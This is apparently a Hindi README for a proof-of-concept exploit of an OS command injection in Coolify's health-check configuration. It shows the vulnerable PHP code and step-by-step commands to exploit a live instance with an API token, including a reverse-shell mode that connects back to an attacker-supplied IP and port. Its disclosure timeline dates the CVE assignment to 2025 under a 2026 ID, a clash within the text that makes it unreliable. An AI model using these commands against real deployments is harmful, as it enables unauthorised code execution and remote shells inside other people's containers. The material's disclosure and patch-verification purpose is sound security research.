
स्वास्थ्य जांच में OS कमांड इंजेक्शन → दूरस्थ कोड निष्पादन
कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में OS कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
कोई भी प्रमाणित उपयोगकर्ता तैनात कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।
Coolify एक लोकप्रिय ओपन-सोर्स, स्व-होस्टेड डिप्लॉयमेंट प्लेटफॉर्म है (30K+ GitHub स्टार) — जो Heroku, Vercel और Netlify का मुफ्त विकल्प है।
कूलिफ़ाई के स्वास्थ्य जांच कॉन्फ़िगरेशन में एक गंभीर OS कमांड इंजेक्शन भेद्यता पाई गई। health_check_host, health_check_method, और health_check_path पैरामीटर बिना किसी सैनिटाइज़ेशन के सीधे शेल कमांड में डाले जाते हैं, जिससे कोई भी प्रमाणित उपयोगकर्ता डिप्लॉयमेंट कंटेनरों के अंदर मनमाने कमांड निष्पादित कर सकता है।
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID │ CVE-2026-59734 │
│ Type │ OS Command Injection (CWE-78) │
│ Severity │ HIGH — CVSS 8.8 │
│ Attack Vector │ Network (Authenticated) │
│ Affected │ Coolify <= v4.0.0-beta.460 │
│ Fixed In │ Coolify >= v4.0.0-beta.469 │
│ Fix Commit │ 23f9156c7 │
│ Reporter │ CyberTechAjju │
└──────────────────┴──────────────────────────────────────┘
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()
// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
"curl -s -X {$this->application->health_check_method} -f " .
"{$this->application->health_check_scheme}://" .
"{$this->application->health_check_host}:" .
"{$health_check_port}" .
"{$this->application->health_check_path} > /dev/null || exit 1",
];
यह PoC स्क्रिप्ट CVE-2026-59734 को दो मोड में मान्य करती है और इसका शोषण करती है:
| Mode | विवरण | जोखिम |
|---|---|---|
--local | भेद्य कोड पैटर्न को ऑफ़लाइन अनुकरण करता है। कोई नेटवर्क अनुरोध नहीं। सभी 3 इंजेक्ट करने योग्य पैरामीटर का परीक्षण + फिक्स की पुष्टि करता है। | ✅ सुरक्षित |
--remote | API के माध्यम से एक वास्तविक कूलिफ़ाई इंस्टेंस का शोषण करता है। स्वास्थ्य जांच कॉन्फ़िगरेशन में पेलोड इंजेक्ट करता है और डिप्लॉयमेंट ट्रिगर करता है। | ⚠️ प्रमाणीकरण आवश्यक |
host, method, path के माध्यम से इंजेक्शन को मान्य करता है + पुष्टि करता है कि escapeshellarg() फिक्स काम करता है--lhost / --lport के साथ अंतर्निहित रिवर्स शेल पेलोडgit clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh
# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
अपेक्षित आउटपुट:
═══ LOCAL VULNERABILITY PATTERN VALIDATION ═══
┌─ Test 1: health_check_host injection
│ ✅ VULNERABLE — Injected command executed successfully
┌─ Test 2: health_check_method injection
│ ✅ VULNERABLE — Method parameter also injectable
┌─ Test 3: health_check_path injection
│ ✅ VULNERABLE — Path parameter also injectable
┌─ Test 4: Verify that escapeshellarg() fixes the issue
│ ✅ SAFE — Sanitized input prevents injection
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID
# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--lhost YOUR_IP \
--lport 4444
# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--cleanup
उपयोग:
स्थानीय मान्यता (सुरक्षित, ऑफ़लाइन):
./coolify_healthcheck_rce_poc.sh --local
रिमोट शोषण (प्रमाणीकरण आवश्यक):
./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONS]
विकल्प:
--url कूलिफ़ाई इंस्टेंस URL (उदा. https://coolify.example.com)
--token API बियरर टोकन
--uuid लक्ष्य एप्लिकेशन UUID
--payload कस्टम इंजेक्शन पेलोड
--lhost रिवर्स शेल के लिए हमलावर IP
--lport रिवर्स शेल के लिए हमलावर पोर्ट (डिफ़ॉल्ट: 4444)
--cleanup शोषण के बाद मूल कॉन्फ़िगरेशन पुनर्स्थापित करें
API टोकन:
ऐप UUID:
curl -s https://YOUR-COOLIFY/api/v1/applications \
-H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
मैंने एक विस्तृत ब्लॉग पोस्ट लिखा है जो पूरी खोज, शोषण और सीखे गए सबक बताता है:
YouTube पर पूरा शोषण डेमो देखें:
| दिनांक | घटना |
|---|---|
| Jan 6, 2025 | 🔍 खोजा गया और GitHub सुरक्षा सलाहकार के माध्यम से रिपोर्ट किया गया |
| Jan 16, 2025 | ✅ कूलिफ़ाई अनुरक्षक द्वारा रिपोर्ट स्वीकार की गई |
| Feb 24, 2025 | 🔬 जांच की पुष्टि हुई |
| Mar 18, 2025 | 🔧 फिक्स प्रतिबद्ध (23f9156c7) |
| Apr 12, 2025 | 📦 v4.0.0-beta.469 में फिक्स जारी किया गया |
| Jul 2025 | 🏷️ CVE-2026-59734 निर्धारित और सलाहकार प्रकाशित |
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
यह PoC सुरक्षा शोधकर्ताओं और बग बाउंटी शिकारियों के लिए है, जिनके पास ऑडिट करने के लिए स्पष्ट, दस्तावेजी अनुमति है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जो आपके नहीं हैं, सख्त वर्जित है और स्थानीय, राज्य और संघीय कानूनों का उल्लंघन कर सकता है।
लेखक (CyberTechAjju) कोई देयता नहीं लेता है और इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
| CVE | लक्ष्य | प्रकार | गंभीरता |
|---|---|---|---|
| CVE-2026-45156 | Nextcloud user_oidc | JWT हस्ताक्षर बाईपास | 🔴 गंभीर (9.8) |
| CVE-2026-59734 | Coolify | OS कमांड इंजेक्शन | 🟠 उच्च (8.8) |
"They forgot to sanitize. I didn't forget to report."
🇮🇳 Hack the planet. 🌎💻